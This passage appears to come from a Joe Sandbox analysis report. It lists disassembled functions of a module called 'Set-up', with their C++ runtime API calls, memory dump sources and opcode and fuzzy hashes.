                                                                                              • Instruction Fuzzy Hash: 6411AC309293248BEB14DF64C48679D7BB0AF10725F008598E961AB384E7B89700DF80
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$strtod
                                                                                              • String ID:
                                                                                              • API String ID: 3632641845-0
                                                                                              • Opcode ID: 887ea63a6238676835bc0d47bae2ec2dc1b327fccc294230b90ff7b9ce6c83d7
                                                                                              • Instruction ID: 62d4394bf8e70b131144ecfd17faf9e6f11af821c7a6f1a0ea17f2d8e1253a68
                                                                                              • Opcode Fuzzy Hash: 887ea63a6238676835bc0d47bae2ec2dc1b327fccc294230b90ff7b9ce6c83d7
                                                                                              • Instruction Fuzzy Hash: C701A27191062CEBCF02AF65E84999E7FB4FF4A360F1140C5E400A7160EB75DA51DB94
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC298EC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000001C,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?,?), ref: 6BC29903
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?,?), ref: 6BC2992B
                                                                                              • numpunct.LIBCPMT(00000000,00000000,00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?), ref: 6BC29941
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC41663,?,?,00000000,00000000,00000014,6BC41C01,?,00000008,6BC3961F,?,?,?,?,00000004), ref: 6BC29959
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3numpunct
                                                                                              • String ID:
                                                                                              • API String ID: 493226150-0
                                                                                              • Opcode ID: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction ID: e0c66a7571b70df2d38d408f35d896d86fcb3679b489a4b65eca424825d28d83
                                                                                              • Opcode Fuzzy Hash: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction Fuzzy Hash: 78018031925206ABEB04DFB4C886B9E77B06F41725F104068E468AB2D2FBFA9740CB50
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29EDC
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000001C,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC29EF3
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(?,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?), ref: 6BC29F1B
                                                                                              • numpunct.LIBCPMT(00000000,00000000,00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?), ref: 6BC29F31
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028,6BC3D1E1,?,?,00000000,00000000,00000014,6BC3ED17,?,0000000C,6BC3962C,?,?,?,?,?), ref: 6BC29F49
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@$??0_??1_??2@H_prolog3numpunct
                                                                                              • String ID:
                                                                                              • API String ID: 493226150-0
                                                                                              • Opcode ID: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction ID: 7ce0e28666a54e74804c2b4d54556cd66fd014b9c7b9a10cda4981ed8f24c1e9
                                                                                              • Opcode Fuzzy Hash: 06a71032322e3b65ef501a068ca5c7d469101b8f57e0b3b8a67b7504b54f9a2e
                                                                                              • Instruction Fuzzy Hash: A4016D315252059BEB44CFA4C84579E77706F41715F1040A8E414EB2D2FBFCD740CB50
                                                                                              APIs
                                                                                              • _CxxThrowException.MSVCR100(6BC1174C,6BC4CA2C), ref: 6BC1CDA4
                                                                                              • ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100(6BC1174C,6BC4CA2C), ref: 6BC1CDB1
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC12E14), ref: 6BC1CDC6
                                                                                              • ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDE8
                                                                                              • ?iostream_category@std@@YAABVerror_category@1@XZ.MSVCP100 ref: 6BC1CDF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?iostream_category@std@@Verror_category@1@$??0exception@std@@ExceptionThrow
                                                                                              • String ID:
                                                                                              • API String ID: 3747888997-0
                                                                                              • Opcode ID: b1dc61f738adb29d3c20bb2caed9ed2024f602b7577200fd025592dbe3384322
                                                                                              • Instruction ID: a3ede1744d5c33514f671eb358c48cc8fdcca13c5ef4228ee7dca23912a046c1
                                                                                              • Opcode Fuzzy Hash: b1dc61f738adb29d3c20bb2caed9ed2024f602b7577200fd025592dbe3384322
                                                                                              • Instruction Fuzzy Hash: 0F0192758282189FC740EFA9C45279F7BA4AF41754F108065E816BF201FA7CCB05DB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1C3A3
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000038), ref: 6BC1C3C5
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getctype.MSVCP100(?,00000038), ref: 6BC1C3CE
                                                                                                • Part of subcall function 6BC3B2D3: ___lc_handle_func.MSVCR100 ref: 6BC3B2D9
                                                                                                • Part of subcall function 6BC3B2D3: ___lc_codepage_func.MSVCR100 ref: 6BC3B2E7
                                                                                                • Part of subcall function 6BC3B2D3: _calloc_crt.MSVCR100(00000100,00000002,?,?,6BC1B87C,?), ref: 6BC3B2F7
                                                                                                • Part of subcall function 6BC3B2D3: __pctype_func.MSVCR100 ref: 6BC3B30B
                                                                                                • Part of subcall function 6BC3B2D3: memcpy.MSVCR100(?,00000000), ref: 6BC3B315
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000038), ref: 6BC1C3E0
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              • ?_Tidy@?$ctype@D@std@@IAEXXZ.MSVCP100(00000038), ref: 6BC1C3EE
                                                                                                • Part of subcall function 6BC1C527: free.MSVCR100 ref: 6BC1C531
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$Locinfo@std@@$H_prolog3$??1_$??0_??0exception@std@@D@std@@ExceptionGetctypeLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowTidy@?$ctype@V12@V12@@___lc_codepage_func___lc_handle_func__pctype_func_calloc_crtmemcpystd::_
                                                                                              • String ID:
                                                                                              • API String ID: 1112794092-0
                                                                                              • Opcode ID: f12967e25bcff04440910c885da093c8d9cfd96d90f963e7eb37437620cb22d5
                                                                                              • Instruction ID: b4c848624c52e9515c9c56a60602ef49a0c6d4929985f521488ec90a3b097c33
                                                                                              • Opcode Fuzzy Hash: f12967e25bcff04440910c885da093c8d9cfd96d90f963e7eb37437620cb22d5
                                                                                              • Instruction Fuzzy Hash: CEF0AF719257148BCF05CFB4C5816DE77B0BF05250F40846AA815BF241E77CDB05DBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23D91
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC23DA4
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC23DAF
                                                                                              • std::locale::locale.LIBCPMT ref: 6BC23DBB
                                                                                                • Part of subcall function 6BC1BB86: std::locale::_Init.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB8B
                                                                                                • Part of subcall function 6BC1BB86: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB92
                                                                                                • Part of subcall function 6BC1BB86: std::locale::facet::_Incref.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB99
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC23DC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$Getgloballocale@locale@std@@H_prolog3IncrefInitInit@?$basic_streambuf@_Locimp@12@MtxinitMutexMutex::_U?$char_traits@_W@std@@@std@@std::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1423025056-0
                                                                                              • Opcode ID: af320e634d1a64d174f0ed8f4abf40b3b88f32b2b354e07a86877da27af65af0
                                                                                              • Instruction ID: 5b2d4a26761ab5289b471a3e95aca4ff953fa507704805141fbd0b143aaade42
                                                                                              • Opcode Fuzzy Hash: af320e634d1a64d174f0ed8f4abf40b3b88f32b2b354e07a86877da27af65af0
                                                                                              • Instruction Fuzzy Hash: 8AE092B5B307524ADB249BB4891231D75F0AFC0A14F50086D95969B680FF7CD740C655
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2408D
                                                                                              • std::_Mutex::_Mutex.LIBCPMT(00000004), ref: 6BC240A0
                                                                                                • Part of subcall function 6BC3BAE3: ??2@YAPAXI@Z.MSVCR100(00000018,?,6BC21266,00000004), ref: 6BC3BAEA
                                                                                                • Part of subcall function 6BC3BAE3: _Mtxinit.MSVCP100(00000000,00000018,?,6BC21266,00000004), ref: 6BC3BAF2
                                                                                              • ??2@YAPAXI@Z.MSVCR100(00000004,00000004), ref: 6BC240AB
                                                                                              • std::locale::locale.LIBCPMT ref: 6BC240B7
                                                                                                • Part of subcall function 6BC1BB86: std::locale::_Init.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB8B
                                                                                                • Part of subcall function 6BC1BB86: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP100(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB92
                                                                                                • Part of subcall function 6BC1BB86: std::locale::facet::_Incref.LIBCPMT(?,6BC1D2B5,?,00000000,00000000), ref: 6BC1BB99
                                                                                              • ?_Init@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@IAEXXZ.MSVCP100(00000004), ref: 6BC240C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$Getgloballocale@locale@std@@H_prolog3IncrefInitInit@?$basic_streambuf@_Locimp@12@MtxinitMutexMutex::_U?$char_traits@_W@std@@@std@@std::_std::locale::_std::locale::facet::_std::locale::locale
                                                                                              • String ID:
                                                                                              • API String ID: 1423025056-0
                                                                                              • Opcode ID: 2280daa5f29923565ee89d4bca0c07ab4e03052a37890e0d27be06d9ba23ab69
                                                                                              • Instruction ID: c4aaca02a1d62d94682e03414113d2ee046b22ea80c71e11ae68aa99a52f43fd
                                                                                              • Opcode Fuzzy Hash: 2280daa5f29923565ee89d4bca0c07ab4e03052a37890e0d27be06d9ba23ab69
                                                                                              • Instruction Fuzzy Hash: F3E0D8B5B3075287DB289BB4891231D75F0AF80614F50042E9256DB780FF7CC740C795
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC1692E
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC16946
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC16AA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow
                                                                                              • String ID: pAgents
                                                                                              • API String ID: 754070855-1392246958
                                                                                              • Opcode ID: a0576214d84b510a6eddb144f0560893d8e13bf0bf073af5ce34cc6a1a07e6d4
                                                                                              • Instruction ID: 7fbb8f28056f23a894a66d4fe0b554d86e371c13247d0244dfd910291b0e1558
                                                                                              • Opcode Fuzzy Hash: a0576214d84b510a6eddb144f0560893d8e13bf0bf073af5ce34cc6a1a07e6d4
                                                                                              • Instruction Fuzzy Hash: 47515A7151C7859FC720CF68C484A9ABBE4FFC9315F40492DF899A7250E778AA04DBA2
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC16BEF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC16C07
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC16CCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow
                                                                                              • String ID: pAgents
                                                                                              • API String ID: 754070855-1392246958
                                                                                              • Opcode ID: eeb68832025943576ae321d27b485e27b7f80f085869dcc051dda3507f5adbe4
                                                                                              • Instruction ID: 71b9e493ed7328b2889b9605b7de5df2d348658c116d05f21eb54058f980e83b
                                                                                              • Opcode Fuzzy Hash: eeb68832025943576ae321d27b485e27b7f80f085869dcc051dda3507f5adbe4
                                                                                              • Instruction Fuzzy Hash: D5413D7551C785DFC721CF24C845B9BBBE4FB89314F000A2DE899A7250EB38A704DBA2
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Stoullx_errnoisspace
                                                                                              • String ID: -
                                                                                              • API String ID: 244305864-2547889144
                                                                                              • Opcode ID: 7fbd1253ad180dfa7a369f74b0dcfa9b21c4af549f5e77040a5b564677d7923f
                                                                                              • Instruction ID: 24bfb9b2b33171ba0f656267167282d34400c91e4767bbc2c7bbad1a496227ea
                                                                                              • Opcode Fuzzy Hash: 7fbd1253ad180dfa7a369f74b0dcfa9b21c4af549f5e77040a5b564677d7923f
                                                                                              • Instruction Fuzzy Hash: 93214D30A259B5DFDB109EADC4407997B65EF46770F90419AFA6487280F7BCCB40C761
                                                                                              APIs
                                                                                              • ??0invalid_link_target@Concurrency@@QAE@PBD@Z.MSVCR100(_Link), ref: 6BC18B84
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8B8), ref: 6BC18B93
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(00000000), ref: 6BC18C08
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_link_target@Concurrency@@ExceptionThrow
                                                                                              • String ID: _Link
                                                                                              • API String ID: 3916662256-3418048212
                                                                                              • Opcode ID: 3d127d508bd21352c48862ff7eb5193884ce8d5c243d780351aedbf40ed72fbc
                                                                                              • Instruction ID: f2a89eb1dba44f166b1e655b0f0e85ee05f65d40d1ea9a5bfa04b03da6a12a03
                                                                                              • Opcode Fuzzy Hash: 3d127d508bd21352c48862ff7eb5193884ce8d5c243d780351aedbf40ed72fbc
                                                                                              • Instruction Fuzzy Hash: 9B219E746287018FD724CF29C890C6AB7F2FB85310310CD6DD5ABA7690EB34F645CA00
                                                                                              APIs
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000017,?), ref: 6BC2FB54
                                                                                                • Part of subcall function 6BC29AC7: _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC29BEB
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,0000003B,?), ref: 6BC2FB90
                                                                                                • Part of subcall function 6BC248B1: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,6BC24964,?,?,00000000,?,6BC29830,?,?,?,?,?,00000014), ref: 6BC248BC
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,0000003B,?), ref: 6BC2FBCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$V?$istreambuf_iterator@$D@std@@@2@0D@std@@@std@@@std@@Getint@?$time_get@$?sgetc@?$basic_streambuf@D@std@@@std@@Stolx
                                                                                              • String ID: :
                                                                                              • API String ID: 2585351434-336475711
                                                                                              • Opcode ID: f7dc4c40636725380f1133b6409fd6f2f6dad071394a1f513426058e7d9ad986
                                                                                              • Instruction ID: 41e671a59b38caf8c96da7efddd0d18d2de3ea84d9dd7250ea3fec03c0baacf7
                                                                                              • Opcode Fuzzy Hash: f7dc4c40636725380f1133b6409fd6f2f6dad071394a1f513426058e7d9ad986
                                                                                              • Instruction Fuzzy Hash: BD2166B642424DBFEB15CF64C8A28DA7BACEF24354F0044AAF98586000F774AB14CB61
                                                                                              APIs
                                                                                              • isspace.MSVCR100 ref: 6BC3BBDC
                                                                                              • _Stoulx.MSVCP100(?,?,?,?,6BC29BF0,?,?,0000000A,?,?,?,?), ref: 6BC3BC00
                                                                                              • _errno.MSVCR100 ref: 6BC3BC38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Stoulx_errnoisspace
                                                                                              • String ID: -
                                                                                              • API String ID: 2785182-2547889144
                                                                                              • Opcode ID: eba88d748c57f8c6d1e4e18ac9e735929e5ae927eb49881d689c89d097473bf7
                                                                                              • Instruction ID: 4f106ea57a8650f8097ab03f7534d1a8aef1f2bb5a1751a69be6bbce3862d9b1
                                                                                              • Opcode Fuzzy Hash: eba88d748c57f8c6d1e4e18ac9e735929e5ae927eb49881d689c89d097473bf7
                                                                                              • Instruction Fuzzy Hash: B9215B71915A79EBDF218E99D894B493F64EF46364F984085ECC487240EA3CDB4187A1
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(async_send called without registering a callback), ref: 6BC1813F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC1814E
                                                                                              • ?ScheduleTask@CurrentScheduler@Concurrency@@SAXP6AXPAX@Z0@Z.MSVCR100(6BC18D4F), ref: 6BC181CC
                                                                                              Strings
                                                                                              • async_send called without registering a callback, xrefs: 6BC18137
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$??0invalid_operation@CurrentExceptionScheduleScheduler@Task@Throw
                                                                                              • String ID: async_send called without registering a callback
                                                                                              • API String ID: 1432483296-1686835759
                                                                                              • Opcode ID: 4c985a623c62fafaab5aa6e3443bdb12a6d6efd8dc3c630de444d76660ead60e
                                                                                              • Instruction ID: b0e98808cc94c0e6554cbe1761cf85fd35dc440dcc8fe9d47e7c16f92f67e320
                                                                                              • Opcode Fuzzy Hash: 4c985a623c62fafaab5aa6e3443bdb12a6d6efd8dc3c630de444d76660ead60e
                                                                                              • Instruction Fuzzy Hash: BF21A13262D204DFDB08DF58C885E9977B4FF46325F2440ADE916AB195EB38DE01DA60
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC1A371
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000034,6BC19295,?,?), ref: 6BC1A391
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1A3A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
